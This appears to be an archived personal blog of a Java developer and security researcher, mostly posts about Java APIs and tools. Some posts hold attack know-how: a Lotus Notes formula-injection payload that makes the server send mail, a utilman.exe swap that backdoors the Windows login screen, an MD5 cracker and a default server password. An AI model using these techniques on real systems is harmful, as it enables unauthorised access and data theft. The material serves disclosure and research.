Adam Boulton's Blog

Cracking MD5 with Google

2011-12-24T08:14:00.000Z

It has been known for a long time now that Google can be used for all kinds of awesome things (Google query hacking etc), and hash cracking is one of them.

I thought I would share something I wrote last year to demonstrate how easy it is to crack MD5, just by using Google. This is easily adapted for use with other hashes, cracking SHA1 works well too. I've found the success rate to be extremely high. Enjoy :)

package md5crack;

import java.io.*;
import java.net.*;
import java.util.logging.*;
import org.apache.commons.codec.digest.DigestUtils;

/**
 *
 * @author Adam Boulton - Using Google to crack MD5
 */
public class MD5Crack {

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        // TODO code application logic here

        if(args[0] == null || args[0].isEmpty())
        {
            System.out.println("-= Google MD5 Cracker =-");
            System.out.println("-= Adam Boulton - 2010 =- ");
            System.out.println("Usage: MD5crack <hash>");
        }
 
        String hash = args[0];
        String url = String.format("https://www.google.com/search?q=%s", hash);

        try {
            URL oracle = new URL(url);
            URLConnection conn = oracle.openConnection();

            //keep Google happy, otherwise connection refused.
            conn.setRequestProperty("user-agent", "Mozilla/5.0 Windows NT6.1 WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.63 Safari/535.7");

            BufferedReader in = new BufferedReader(
                    new InputStreamReader(
                    conn.getInputStream()));
            
            String inputLine;

            while ((inputLine = in.readLine()) != null) {
                String[] words = inputLine.split("\\s+");

                for (String word : words) {
                    String wordHash = DigestUtils.md5Hex(word);
                    if (wordHash.equals(hash)) {

                        System.out.println("[*] Found: " + word);
                        System.exit(0);
                    }
                }
            }
            
            System.out.println("[!] No results.");
            in.close();

        } catch (IOException ex) {
            Logger.getLogger(MD5Crack.class.getName()).log(Level.SEVERE, null, ex);
        }
    }
}

New security vulnerability: Lotus Notes Formula Injection

2011-11-19T09:02:00.000Z

From time to time, I get an opportunity to do some independent research. Something that has always particularly peaked my interest is Lotus Notes environments, both the administration and development platform. I feel what makes it an interesting environment is:

1. The focus is business applications
2. There has never been a significant focus from the IT security industry (Fortify doesn't even scan Lotus code)
3. My father happens to be a Lotus Notes Certified Developer.

These three points make an interesting recipe for security assessments.

Back in April 2010 I was having a usual tech talk with my dad about IT in general and software development practices. This is when I was introduced to the Domino Blog. Domino Blog is a Lotus Notes application offered by IBM as a weblog solution. It is generally intended for social media networking, allowing users to post topics and allow the general public to supply comments. This application is deployed within a Lotus Domino
environment and is utilized by a wide audience, from IBM employees to the general public.

My dad happened to have this setup on one of his servers, so it was all ready to break. To speed things up, we moved straight onto a secure code review of the application. The scope of tainted data was fairly limited, so it didn't take long to identify all the entry points, which makes the assessment much easier.
There are interesting functions in LotusScript, but one in particular is the 'Evaluate' function, which allows a Developer to build dynamic functionality by executing Lotus Notes Formula statements. For those who are familiar with other injection vulnerabilities (SQLi), I am sure the problem is becoming apparent.

It just so happens that in the Domino Blog there are Evaluate functions which are a sink for data received from HTTP requests without performing data encoding. To move straight onto an example payload it would look like this:


http://lotusnotesblogdomain.co.uk/blog.nsf/archive?openview&title=Motorbikes&type=cat&cat=");
@MailSend("adamboulton@gmail.com";"";"";"Formula%20Injection";
"The%20email%body%belongs%here");
@IsText("

The payload above would force the Domino server to issue mail. As the Evaluate function supports wrapping of formula functions, it is trivial to start pulling data from the server and get it delivered to an email account.

An attacker simply requires the knowledge of how to correctly construct the statement to meet the requirements of the Evaluate function, and gain familiarity with the Formula language. As can be on the formula poster there is extremely powerful functionality that can make the payloads extremely interesting, and can certainly result in total compromise of the Lotus Notes server. I've appropriately coined this vulnerability Lotus Notes Formula Injection :)

Certainly add this to your list for web app or source code reviews of a Domino application.

Note: This was all responsibly disclosed to IBM in April 2010.

Update: 24/12/2011 - I thought it was pretty cool to see this picked up by WhiteHat Security and put in Jeremiah Grossman's blogspot

JavaPayload project

2011-07-20T22:17:00.000+01:00

This is not one to be missed! It is very impressive, Michael (Mihi) has clearly worked hard on this, kudos to him!

http://javapayload.sourceforge.net/

Insecure coding examples

2011-07-18T08:00:00.001+01:00

A really useful list of test cases are available on the DHS National Cyber Security Division:

http://samate.nist.gov/SRD/view.php

Java RMI Server Insecure Default Configuration Java Code Execution

2011-07-16T22:17:00.000+01:00

Now this is interesting, a Java RMI remote code execution due to a default method being exposed by the distributed garbage collector. It is going to be a fun one to test!

http://www.exploit-db.com/exploits/17535/

The Metasploit page can be found here:

http://www.metasploit.com/modules/exploit/multi/misc/java_rmi_server

Update: Confirmed as working. It does rely on the RMI service being tunneled over HTTP. This particular exploit won't work directly with the typical JRMP services, but I am sure a similar vulnerability will exist. Warrants further digging....

Java analysis and reverse engineering

2011-06-23T22:00:00.001+01:00

Some really neat tools here:

http://www.woodmann.com/collaborative/tools/index.php/Category:Java_Tools

Java bytecode analysis

2011-06-23T20:26:00.000+01:00

As with any language, there are always best practices. One that I wanted to take a deeper look into is from Joshua Bloch's book, Effective Java. The one in particular is item 4 - Avoid creating duplicate objects.

I wanted to take a deeper look as to what is actually happening at the byte code level. Joshua's recommendation is to never create a String as follows:

String str = new String("my string"); //never do this

and instead do:

String s = "my string";

The first statement results in an additional String instance being created.

So, taking a look at the Java bytecode using a single String instance we see:

LDC "my string" //push string "my string" onto stack
ASTORE 2 //store it in local variable 2

So it only requires two opcodes for a single String declaration and assignment. Let's compare this to the other "bad" example of creating a String instance unncessarily:

NEW java/lang/String //Make a new String object and leave a reference to it on the stack:

[ Stack now contains: objectref ]

DUP //Duplicate the object reference:

[ Stack now contains: objectref objectref ]

LDC "my string" //push string "my string" onto stack
INVOKESPECIAL java/lang/String.<init>(Ljava/lang/String;)V 
//call the String instance initialization method

ASTORE 3 //and store it in local variable 3

As we can see, there is quite the difference as there are now five opcodes to achieve the same result. What I am going to be really interested in is taking a look at the translated interpreted code / native code.

Java LiveConnect

2011-03-03T08:47:00.000Z

LiveConnect is a feature of web browsers which allows Java applets to communicate with the JavaScript engine in the browser, and JavaScript on the web page to interact with applets. The LiveConnect concept originated in the Netscape web browser, and to this date, Mozilla and Firefox browsers have had the most complete support for LiveConnect features. It has, however, been possible to call between JavaScript and Java in some fashion on all web browsers for a number of years.

http://jdk6.java.net/plugin2/liveconnect/

Watcher v1.5.1 has been released

2011-02-22T10:15:00.000Z

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
Works seamlessly with complex Web 2.0 applications while you drive the Web browser
Non-intrusive
Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
Configurable domains with wildcard support
Extensible framework for adding new checks

Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com

Download Watcher from: http://websecuritytool.codeplex.com

IBM Lotus Domino LDAP Bind Request Remote Code Execution Vulnerability

2011-02-19T09:58:00.001Z

I am quite interested in Lotus Domino security, I think it makes an interesting platform for attacking for several reasons. It is a fully packed solution for enterprises (email, collaboration platform and custom application platform) and I don't believe the product has even really been scrutinized from a security pespective.

A remote code execution exploit is now available for the LDAP service, which is enabled by default :s The source of an exploit can be found here.

DOM XSS Scanner

2011-02-19T08:50:00.001Z

DOMXSS Scanner

DOMXSS Scanner is an online tool that helps you find potential DOM based XSS security vulnerabilities. Enter a URL to scan the document and the included scripts for DOMXSS sources and sinks in the source code of Web pages and JavaScript files.

http://www.domxssscanner.com

Java SE 6 Update 24 released

2011-02-18T11:28:00.001Z

JDK 6 Update 24 is now available to download from Oracle’s Java download page. Looking at the release notes, this is mainly a security and bug fix release. Thankfully, they have addressed the floating point parsing vulnerability which resulted in a denial of service of the JVM through excessive resource consumption.

Patriot NG 2.0 released

2011-02-13T09:16:00.000Z

Patriot NG is a 'Host IDS' tool which allows real time monitoring of changes in Windows systems or Network attacks. It is available for Windows XP, Windows Vista, Windows 7 (32Bits & 64bits)

Patriot monitors:

Changes in Registry keys: Indicating whether any sensitive key (autorun, internet explorer settings...) is altered.
New files in 'Startup' directories
New Users in the System
New Services installed
Changes in the hosts file
New scheduled jobs
Alteration of the integrity of Internet Explorer: (New BHOs, configuration changes, new toolbars)
Changes in ARP table (Prevention of MITM attacks)
Installation of new Drivers
New Netbios shares
TCP/IP Defense (New open ports, new connections made by processes, PortScan detection...)
Files in critical directories (New executables, new DLLs...)
New hidden windows (cmd.exe / Internet Explorer using OLE objects)
Netbios connections to the System
ARP Watch (New hosts in your network)
NIDS (Detect anomalous network traffic based on editable rules)

Download: http://www.security-projects.com/?Patriot_NG:Download

Documentation: http://www.security-projects.com/ManualPatriot-NG2.0EN.pdf

Video demo: http://vimeo.com/19798452

BeEF v.0.4.2.2-alpha Released

2011-02-13T09:13:00.001Z

BeEF, the Browser Exploitation Framework is a professional security tool provided for lawful research and testing purposes. It allows the experienced penetration tester or system administrator additional attack vectors when assessing the posture of a target. The user of BeEF will control which browser will launch which command module and at which target.

BeEF hooks one or more web browsers as beachheads for the launching of directed command modules in real-time. Each browser is likely to be within a different security context. This provides additional vectors that can be exploited by security professionals.
BeEF provides a professional and simple user interface. It is easy to deploy and is implemented in Ruby so it will run on most Operating Systems. The framework contains various command modules which employ BeEF's simple API. This API facilitates quick development of custom modules by the user.

Download: http://code.google.com

SABnzbd Java API version 0.2

2010-07-04T15:10:00.000+01:00

I have now released another Google Code Project in relation to Sabnzbd. This is a Java API that consumes Sabnzbd server functions. It supports alot of functionality at the moment, querying all information about the server and downloads and also supports other functions such as adding downloads, pausing and resuming the server.

More detail can be found on the Google Code Project here:

http://code.google.com/p/jsabnzbd/

SABnzbd Java API

2010-02-19T22:05:00.000Z

For all you SABnzbd fans, i've got a real treat for you. I've just put together a Java API (must admit didn't take long) to support various functions that SABnzbd supports. Here is a sneak preview of what you will be able to do with the API:


 
String[] nzbs = 
{"http://www.newzbin.com/browse/post/5569239/nzb",
 "http://www.newzbin.com/browse/post/5568352/nzb"};

String sabURL= "http://sabserverurl";
SABnzbd mySabServer= new SABnzbd(sabURL, "uname", "pwd");

System.out.println("Current download speed: " + mySabServer.getDownloadSpeed());

for(String nzb: nzbs)
{
 mySabServer.download(nzb);
}

List queue = mySabServer.getQueue();

if (queue.isEmpty()) {
  System.out.println("No download entries");
} else {
  for (QueueEntry qu : queue) {
    System.out.println("---- New Entry --- ");
    System.out.println("Category: " + qu.getCategory());
    System.out.println("Name: " + qu.getName());
    System.out.println("Reamining " + qu.getRemain());
    System.out.println("Total:" + qu.getTotal());
    System.out.println("ETA: " + qu.getEta());
  }
}

Orange SMS API

2010-01-26T10:11:00.000Z

So you own an account with Orange and you want to have the ability to send SMS using your Orange credit which you have already paid for on your monthly contract? Well I certainly did, and the API works identically to the T-Mobile API which I developed. So here is an example of how you would use my Java API to send an SMS through the Orange network:

Orange orange= new Orange("username", "password");
orange.sendSMS("01234567890", "Hello World!");

I have found this particularly useful as it has allowed me to load balance the sending of SMS through either the T-Mobile or Orange network. Due to both of the classes which now implement the "MobileNetwork" interface means you can program to the interface not the implementation. Now being able to utilise two separate GSM networks also improves the stability of all the applications I develop which require SMS communication. Please feel free to contact me via email if you feel this is something of interest to you.

Netbeans IDE not loading...

2010-01-12T14:54:00.001Z

For all the Netbeans fans out there (I am certainly one of them) you may have come across at some point that Netbeans will not load after the loading of modules and you may end up with a blank screen or just a basic outline of the Netbeans window. After doing some debugging to find out what is going on the best solution I have found is to delete the Netbeans cache. You can find out where your cache is stored by looking inside your Netbeans conf file and you will see an entry similar to:

# ${HOME} will be replaced by JVM user.home system property
netbeans_default_userdir="${HOME}/.netbeans/6.7"

So for most Windows based users you will probably find your cache directory here:

C:\Documents and Settings\<USERNAME>\.netbeans

Simply remove the ".netbeans" directory (ensure Netbeans is not loaded) and you should be good to reload. Note though that you will lose configurations, for example you won't have any projects listed when you next load, also any custom services won't be listed like databases of web servers. I have found it is quick enough to put it all back in and you should be up and running again within a few minutes.

Java Weather API

2010-01-09T10:15:00.000Z

Knowing what is happening with the weather is always a piece of useful information worth having. After Googling around I wasn't able to find an actually Java API for the weather and I could see many others were just looking for a simple Java API to plug into their system. So I started the development with a friend, Luke Morgan, and we are at the stages where the API has reached a mature level and is something we will release shortly, most likely as part of a Google Code project. The API is extremely easy to use (as it should be!) and here is an example of how it would be utilised:

Weather weather;
try
{
   Weather weather = WeatherStation.getWeather("wirral");
}
catch(WeatherStationException wse)
{}

   weather.getConditions();  //Returns a string, such as "Fog", "Partly Cloudy"
   weather.getTemperature(); //returned in degree celsius

So as you can see, incorporating this API into any application is trivial. The API also supports the forecast for weather. So, for example, it could be successfully utilised as:

Forecast forecast;
try
{
   forecast = WeatherStation.getForecast("wirral");
}
catch(WeatherStationException wse
{}

   for(Weather weather: forecast.getForecast()) //returns a list of Weather (4 days)
   {
      System.out.println(weather.getDate() + " is forecast for " + weather.getConditions());
   }
}

This is something I have personally utilised as part of Jarvis - the virtual assistant. By utilising this API in my system I receive weather updates automatically each morning, giving me the current condition and forecast data then receiving another update at night giving me tomorrows forecast. The updates are mostly delivered using my T-Mobile API. It is further utilised by the fact that Jarvis has access to my Google Calendar, so for each event Jarvis also delivers the weather conditions.

In the meantime if you would like access to this code please feel free to contact me.

Jarvis - The Virtual Assistant

2010-01-09T09:57:00.000Z

I have been busy writing alot of Java APIs lately, specifically for plugging into an virtual assistant that I am constructing, called Jarvis. The concept behind Jarvis is that of any assistant, it is a tool who or that helps another person accomplish his goals but the beauty of a virtual assistant is one that never sleeps and they don't take a salary. Communication is always a key to successful assistants and I have accomplished this by developing a modularised communication system which utilises email, SMS and chat rooms. For example, Jarvis is currently able to communicate via email, SMS and Google Talk. Commands can be issued via any of those methods and Jarvis responds via the appropriate medium based upon my status and using some seamless intelligence. For example, if I issue a command such as "define assistant" via SMS and the definition is over 160 characters the communication control centre will find a more appropriate medium to deliver the response, for example if I am logged into Google Talk then Jarvis responds via that channel.

I have been making good progress on this project over the past months, currently offloading tasks such as bank account checks (the jHSBC API mentioned below has been plugged into the Jarvis system and I receive alerts about bank account changes), and Jarvis is also plugged into my Google Calendar allowing the system to send updates via SMS to myself but also any other relevant parties who are attached to that event.

Designing Jarvis has prompted me to develop many APIs in order for the system to perform a wide range of tasks. The capabilities of Jarvis so far continue to extend, most recently I have developed a Java API for Weather and an API for mapping journeys. I will be releasing more information on these APIs shortly.

T-Mobile API

2009-07-30T10:21:00.000+01:00

I currently have a mobile account with T-Mobile, who give me a generous £200 worth of credit each month for £20. It is actually quite difficult to take advantage of all the credit, I usually only utilise about £100 a month of it. So I decided to take advantage of it by writing a Java API for accessing and using certain features of my T-Mobile account. I have been using my T-Mobile API in my software, such as the HSBC bot to deliver updates to myself. Using my T-Mobile API is extremely easy, here is a taster.....

TMobile tmobile = new TMobile("username", "password");
tmobile.sendSMS("01234567890", "Hello World!");

In order to use this API you must have an account with T-Mobile (http://www.t-mobile.co.uk) and the ability to send web texts from your account. This API is reliable and stable. It is ideal for utilising it for desktop and web applications. If you would like access to this codebase please contact me via email.

Windows Storage Server 2008

2009-07-12T10:57:00.000+01:00

Yesterday I replaced my FreeNAS with Windows Storage Server 2008. While FreeNAS is a great piece of software I finally realised it just wasn't for me, mainly because I am more comfortable within a Windows environment but there were some fairly big issues such as:

1. No JVM (You would have to install Diablo on FreeNAS if you wanted one and I like to stick with Sun's JVM). I do alot of Java development and really want to customise my Storage server with custom tools.

2. Bit Torrent client - Transmission is the default client and it seemed to prove a headache for many if wanting to update it. Most people just waited for the FreeNAS update which usually ships with the latest version. I wanted uTorrent back as it is by far the most lightweight, feature packed and fastest BT client I have ever used. Tranmission would only give me download speeds of around 3.5MBps but uTorrent is able to max my line at 6MBps.

Oh, and one more thing, I was quite surprised when I first booted Windows Storage Server 2008 to see that if was prompting me for credentials when I have never supplied any. The default password is "wSS2008!"

Adam Boulton's Java HSBC API - No, not the payment gateway!

2009-06-30T21:07:00.001+01:00

So, I have finally got round to setting up the HSBC Java API (some of you may remember my posts from months back mentioning my personal project I was working on HSBC Bank account aggregation). Writing this API has been a personal project of mine which has been on and off for a while now due to other committments. The idea behind this API is that it easily allows you to access your UK HSBC accounts and transaction history. I have so far found it useful for tracking my expenditure (by grouping transactions) and using it for notifications about the most recent transaction to be processed on my account. I am sure many developers will find this project interesting and will find many interesting ways to incorporate it into their applications.

I have finally started a Google code project......

http://code.google.com/p/jhsbc/

Java PDF Library

2009-06-30T16:06:00.000+01:00

I have been playing around with extracting data from PDF files. Apache PDF Box looked pretty promising but unfortunately it is far behind some of the others that are available. iText is a mature library but lacks the ability to extract information (it is actually a PDF creator). I was very impressed by the work done by LAB Asprise!. It took minutes to understand their impressive API and start coding. The parsing is fast, and so far appears accurate. The library is also extremely small for the abilities it provides (just over 3MB). If you are looking for a powerful Java API for processing PDFs then I strongly recommend it. Here is a code sample for extracting text (taken from their site). The code clearly demonstrates how much of an awesome job these guys have done....

PDFReader reader = new PDFReader(new File("my.pdf"));
reader.open(); // open the file.
int pages = reader.getNumberOfPages();

for(int i=0; i < pages; i++)
{
String text = reader.extractTextFromPage(i);
System.out.println("Page " + i + ": " + text);
}

Security Assessing Java RMI Slides

2009-04-09T08:11:00.000+01:00

There has been alot of interest lately in RMI security and people trying to hunt down my slides from the presentation I did at OWASP. The slides can be found here.

The original presentation can be found:
http://video.google.com/videoplay?docid=1673714450539106400#

Editing webpages with JavaScript snippet

2009-03-25T11:44:00.000Z

So, most of you will no doubt know that you can execute JavaScript from the URL bar and how useful it can be. For example, you could view the text is password fields which has proved to be useful on several occassions (alert document.form1.passwordField.text) . An interesting JS snippet I came across was:

javascript:document.body.contentEditable='true'; document.designMode='on'; void 0

Just type that into the URL, then you can start editing the webpage you are viewing straight from the browser.

Disable HtmlUnit logging

2009-03-10T21:26:00.001Z

HtmlUnit is a pretty decent scriptable browser. I use it for developing alot of website scrapers and various bots. By default, the logging to the standard output stream is pretty verbose. A quick way to disable it programmatically is to add the following static initializer to your code:

static {

LogFactory.getFactory().setAttribute("org.apache.commons.logging.Log", "org.apache.commons.logging.impl.NoOpLog");

}

Strings are immutable in Java. Really, Mr. Anderson?

2009-03-10T09:53:00.000Z

Take a look at the following code, the output is not what you may expect ;)

//MindWarp.java
public class MindWarp

{
  public static void main(String[] args)
  {
   System.out.println(MR_ANDERSON);
  }
  private static final String MR_ANDERSON = "Adam, RIM Security Researcher";
  private static final Warper warper = new Warper(); //The hackers class ;)
}

//Warper.java - Hacks the String object which is on the heap....
import java.lang.reflect.*;

public class Warper

{
private static Field stringValue;

static

{
   try
   {
   stringValue = String.class.getDeclaredField("value"); //String has a private char [] called "value"
   }
   catch(NoSuchFieldException ex)
   {

//Should deploy a safety net here i.e enumerate a char[] incase the variable inside the String class is not called "value"
   ex.printStackTrace();
   }
   if (stringValue != null) {
   stringValue.setAccessible(true); // make field public ;)
   }
  }
  public Warper() {
   try {

//String must be same length, otherwise IndexOutOfBoundsException
   stringValue.set("Adam, RIM Security Researcher", "You have been hacked! ! ! ! !".toCharArray());
   } catch(IllegalAccessException ex) {} // shhh
  }
}

Assembly competitions

2008-11-07T20:40:00.000Z

I have been in a couple of Assembly competitions recently on a private forum. They have been very interesting, one in particular was to create the smallest PE file (Windows executable) that displays the message "ADZ" in a graphical message box i.e use of user32.MessageBoxA() and must exit without an exception. I am currently in first position with 109 bytes! So its a challenge to any reverse engineering experts to try and beat that ;) I will be posting my solution and analysis once of the competition ends, which is in about 5 days. Here is a useful resource to get you started:

http://www.phreedom.org/solar/code/tinype/

EDIT: Well 109 bytes was a clear winner :) If anyone got smaller don't hesitate to let us know! Here is my bytecode:

4D 5A CC CC 50 45 00 00 4C 01 01 00 68 21 00 40
00 E8 65 1D 40 7C EB 2D 04 00 03 01 0B 01 08 00
04 75 73 65 72 33 32 00 04 00 00 00 0C 00 00 00
04 00 00 00 0C 00 00 00 00 00 40 00 04 00 00 00
04 00 00 00 04 6A 30 EB 05 41 44 5A 04 00 68 6A
00 40 00 EB 01 CC EB 01 88 68 6A 00 40 00 EB 02
02 00 6A 00 E8 81 07 05 7E C3 53 41 46

OWASP NYC

2008-10-02T20:42:00.000+01:00

Fantastic conference, the presentation went really well. Already starting to see people referencing my RMI hacking presentation, thanks for all the feedback!

Gunter Ollman's Blog

Secshoggoth

It is great to see the search engine results changing in respects to RMI security. The start of all this happened 4 years ago during my Software Engineering degree and I was taught to develop my first RMI service. At the time, things didn't seem right from a security perspective but I didn't have the time nor skillset to pursue it at the time. I remember attempting to assess an RMI service at the time but couldn't get past step 1 of what I presented at the OWASP conference. However, my interest was sparked again during a security assessment, so over the last few weeks the RMI research began and things started to come together very quickly. I am looking forward to releasing alot of research and new tools over the coming weeks.

Cheers

EDIT: The video is now available via Google Videos

Hacking RMI services

Update: Unfortunately I will no longer be releasing the RMI Assessment tools. I have recently left Corsaire and will be joining Research In Motion (Blackberry). The research and tools are Corsaire's intellectual property.

Hacking Java Remote Method Invocation

2008-09-22T01:55:00.001+01:00

Things have been a quiet here recently. I have been preparing for my RMI hacking presentation for OWASP in NYC. I have developed a suite of tools which finger print an RMI service and aid in building the vital stub component which is required to communicate with RMI services. A video of my presentation will be available on the coming weeks and the software will be released soon. You can find an abstract of my talk here:

Security Assessing Java RMI at OWASP NYC

I look forward to seeing you all.

Breaking the bank

2008-08-16T01:58:00.000+01:00

My new paper has finally been released after weeks of intense peer reviews. This paper draws attention to how the use of common programming APIs and practices could lead to flaws in the processing of numeric data, which could allow attackers to manipulate the outcome of transactions or otherwise interfere with the accuracy of calculations. It discusses the technical vulnerabilities typically observed in both the validation and processing of numeric data that could expose an organisation to unmanaged risk. It is intended for a technically literate audience involved in developing or testing financial applications, and to provide technical insight to those responsible for their management. The vulnerabilities are presented with source code examples, suggestions on how to identify the flaws during the testing phases and recommendations for mitigating the risk.

http://research.corsaire.com/whitepapers/080715%20-breaking-the-bank-numeric-processing.pdf

A colleague and good friend of mine, Daniel Cuthbert, has presented parts of the research at OWASP NYC 2008, the video is available here.

Enjoy

Backdooring Windows (XP, Vista) Authentication

2008-06-19T13:47:00.000+01:00

From the Windows login screen there is one accessible application, the Utility Manager (c:\windows\system32\utilman.exe). You can access this by pressing win key + U. To add a backdoor to the windows login screen boot into a live distro (BackTrack, BartPE etc) so the disk can be mounted. Simply replace utilman.exe with a copy of cmd.exe. When presented with the login screen pressing the win key + U will present you with a console with the highest privileges; SYSTEM. Running "explorer" from the console will present the taskbar leaving the login screen as a backdrop. This is a great backdoor for a system as it will most likely go undetected. It will certainly not be picked up by any AV system.

HSBC Bank Account aggregation

2008-03-20T09:13:00.001Z

No doubt that most of you use online banking. I am certainly a great fan. There are a couple of annoyances such as the logging in process which I find tedious as it is something that can be totally automated. Also, my online banking only gives me statements from the previous 3 months. Therefore, I have been working on a Java Swing application which focuses on the HSBC Personal Internet Banking to automate the login process and to automatically retrieve all the account details which could then, for example, be used as a feed / gadget for iGoogle or social networking sites. The HSBC class file will be available soon.....

Why all good Developers and penetration testers should "Know thy API"

2008-01-18T21:06:00.000Z

Trawling through an API always exhibits interesting results. A vital motto of Developers and respectable penetration testers should be "know thy API". As a Developer I will rely on the API to aid validation and at the same time I should be aware of any "gotchas" that can lie in the undergrowth when creating an Object, for example values which can be passed during instantiation that you would not normally expect. As a penetration tester I will use anomalies to my advantage to circumvent validation routines.

Knowing the values which can be used to instantiate certain Objects can yield interesting results. Let's take the java.math.BigDecimal class as an example as it is an Object I would expect to be used when testing financial applications. There have been many occasions when the "exponent hack" has come in useful as it can be used to bypass validation routines which in turn results in overflows, being able to create values less than 1 (without starting with zero or using decimal notation), and a wide range of other exceptions / unexpected behaviour when combined with other components.

I have seen Developers attempting to validate a number based on length of the string (shocking but true!). For example, it was assumed that if the length of the string was less than or equal to 4 then the number could not exceed 9999. We could envisage the code something along the lines of:

String sNumber = request.getParamater("numberNoMoreThan5Char");

//Make sure the number is less than 9999 and greater than 0.
if(sNumber.length() <= 4 && sNumber.charAt(0) != "0") BigDecimal myNumber = new BigDecimal(sNumber);

The use of scientific notation will allow us to bypass this poor validation routine (the goal here is to instantiate BigDecimal and not to result in a NumberFormatException, which can be easily achieved). For example, if "numberNoMoreThan5Char" is set to "1e10" we meet the validation requirements as the string is equal to four characters and does not begin with zero. However, BigDecimal is then instantiated with with a value of 10000000000. Similarly, by passing "1e-9" results in the BigDecimal being instantiated with the value of 0.000000001. As expected, this will cause further complications throughout the application and will most likely lead to data degradation i.e data which is stored that would have never been expected.

A second example can be seen with the java.lang.Double class. A technique which is often used to determine if a number is valid (I found this code in the OWASP ESAPI project) goes along the lines of:

public boolean isValidNumber(String input)
{
try
{
Double.parseDouble(input);
}
catch (NumberFormatException e)
{
return false;
}
return true;
}

Now scientific notation can be used here and of course this isn't a problem as such notation results in a valid number. But before we proceed let's quickly delve into the Java API documentation and take a look at the explanation of Double.parseDouble(String):

parseDouble

public static double parseDouble(String s) throws NumberFormatException

Returns a new double initialized to the value represented by the specified String, as performed by the valueOf method of class Double.

Parameters:: s - the string to be parsed.
Returns:: the double value represented by the string argument.
Throws:: NumberFormatException - if the string does not contain a parsable double.
Since:: 1.2
See Also:: valueOf(String)

It may therefore come as a surprise that passing a string with the value "NaN" (not-a-number) or "Infinity" will result in isValidNumber returning true. For example, Double.parseDouble("NaN") or Double.parseDouble("Infinity") is perfectly valid and actually returns a Double with a value set to "NaN" or "Infinity" and in a lot of situations is not what a Developer would expect or want for that matter. This is a perfect example of what happens when Developers rely on an API to perform validation without knowing the anomalies. A little investigation reveals how we are able to pass "NaN" and "Infinity" as a valid argument. Let's take a look at the code for Double.parseDouble(String):

public static double parseDouble(String s) throws NumberFormatException
{
return FloatingDecimal.readJavaFormatString(s).doubleValue();
}

Yep, just one line of code! Well it appears we will have to dig down just a little further and check out the FloatingDecimal class and see what resides in the method readJavaFormatString(String). As it turns out, this method is 249 lines long! So I have selected the interesting piece from the method:

// compare Input string to "NaN" or "Infinity"
int j = 0;
while(i <>
if(in.charAt(i) == targetChars[j]) {
i++; j++;
}
else // something is amiss, throw exception
break parseNumber;
}

// For the candidate string to be a NaN or infinity,
// all characters in input string and target char[]
// must be matched ==> j must equal targetChars.length
// and i must equal l
if( (j == targetChars.length) && (i == l) ) { // return NaN or infinity
return (potentialNaN ? new FloatingDecimal(Double.NaN) // NaN has no sign
: new FloatingDecimal(isNegative?
Double.NEGATIVE_INFINITY:
Double.POSITIVE_INFINITY)) ;

As we can see from the code comments it is clear that it has been designed to take "NaN" and "Infinity" as a valid argument. Developers can be forgiven for not expecting such values to be valid as it was not directly mentioned in the API documentation for parseDouble(String) as we saw above. Although there are actually some clues as the documentation did mention:

See Also:

valueOf(String)

As a Developer I find it vital that I need to be aware of such anomalies to keep the code well validated and will often find myself digging deeper down the Java package tree so I can manually check for anything unexpected, I can then tweak my validation accordingly and combine such details to construct a more intelligent alerting log system (if I saw the anomalies passed to my application it would make me very suspicious). As a penetration tester I will use these anomalies as a means for attacking an application, and as we have seen such techniques come in extremely useful.

OWASP - Java Gotchas

2008-01-15T17:14:00.000Z

As I spend more time developing in Java and analysing others source code for quality and security issues I come across some common pitfalls that often catch Developers out, some which can have serious consequences on the logic. From time to time I rip open some of the Java classes developed by Sun to get a deeper understanding as to what goes on behind the scenes. There is a particular topic that I enjoy contributing to on OWASP called Java Gotchas (unfortunately not as much as I would like to). If Java is your thing I am sure you will find something on there of interest and of course please feel free to contribute.

“If you’re not sure what you’re about to run, then don’t click Run!”

2008-01-14T15:32:00.000Z

Note: When I use the term “users” in this article I am reflecting upon my experiences with technical and non-technical users.

When something is a mystery how can you be expected to know what the best response would be? This is why it is important to adopt best practices to prevent falling into nasty traps. The general rule of thumb is not click “OK” or “Run” if you don’t know what it is or where it came from.

Having somewhat of an unhealthy obsession with Java I want to correct the misconception that Java is “safe”. Now, I am not talking about vulnerabilities such as buffer overflows as these problems are rare due to them existing, for example, when JNI is used and then in which case it is not really the fault of the JVM.

The focus of this discussion concentrates on the functional capabilities of Java and the common misconceptions; this can also apply to other development kits for that matter. Anyone who is familiar with Java will know that it is has a rich API and there really aren’t any functional limitations. I believe the misconception of Java being “safe” has emerged due to the lack of association with malware. But a tool or development kit is only as safe as the intentions from the user or developer.

I find it surprising that Java has not become a greater focus for performing malicious activities such as a mechanism to deliver payloads. With the misconception of Java safety and the fact that it is not a primary focus for the anti-virus industry it would seem like an ideal combination for malicious use. Let’s face it, Virus Analysts specialise in lower level languages such as Assembly and C++, not Java.

So as an example let’s explore the world of Java applets. Users often feel a false sense of heightened security when using a web browser, even more so when confronted with a Java applet. When it comes to Java applets they can be considered secure in a lot of respects due to them being constrained to a sandbox environment but signed Java applets can perform the equivalent of Java desktop applications. It is a trivial task to sign your own applet, a quick Google search will present you plenty of examples (although I will show you how I signed my applet in a minute)

The core of the problem lies with users accepting signed Java applets, we see the same problem when users execute attachments from emails. However, users are becoming increasingly cautious of email attachments but I the same is not true for signed Java applets. The following video demonstrates the capability of a signed Java applet.....

It's currently hosted here, but the video quality is a bit trashed. It is more worthwhile downloading from here:

http://rapidshare.com/files/85112606/Dont_click_Run.wmv.html

Note: The applet was signed using the following commands:

Step 1: jar cvf NotepadApplet.jar NotepadApplet.class

Step 2: keytool -genkey -alias signFiles -keystore compstore -keypass kpi135 -dname "cn=Adam Boulton's Applet Patcher" -storepass 123456

Step 3: jarsigner -keystore compstore -storepass 123456 -keypass kpi135 -signedjar TheSignedNotepadPatcher.jar NotepadApplet.jar signFiles

Step 4: keytool -export -keystore compstore -storepass 123456 -alias signFiles -file Notepad.cert

A new beginning....

